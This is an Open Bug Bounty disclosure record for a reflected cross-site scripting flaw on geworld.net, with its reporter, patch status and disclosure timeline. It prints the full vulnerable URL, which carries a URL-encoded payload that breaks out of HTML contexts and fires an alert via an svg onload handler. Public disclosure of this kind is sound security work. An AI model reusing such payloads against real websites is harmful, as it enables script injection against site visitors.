geworld.net XSS vulnerability

2017-02-17T01:23:00
ID OBB:214001
Type openbugbounty
Reporter OmniGooch
Modified 2017-05-30T17:33:00

Description

Vulnerable URL:
http://geworld.net/NEW/?page=search&keyw;=%27%7D%7D;%22%3E%7D);%7D);%7D)]--%3E%3C/SCRIPT%3E-%3C/style%3E-%3C/title%3E-%3C/BoDy%3E-%3Cmarquee%3E-%3Ch1%3EOmniGooch%3C/h1%3E-%3C/marquee%3E-%3Csvg/onload=alert(%27XSSPOSED%27);%3E;%7B%7B%27
Details:

Description| Value
---|---
Patched:| Yes, at 30.05.2017
Latest check for patch:| 30.05.2017 02:17 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1400021
VIP website status:| No
Check geworld.net SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 17 February, 2017 01:23 GMT
Generic security notifications sent to website owner| 17 February, 2017 01:26 GMT
Vulnerability details disclosed by researcher| 24 February, 2017 02:14 GMT
Vulnerability patched by the website owner| 30 May, 2017 17:33 GMT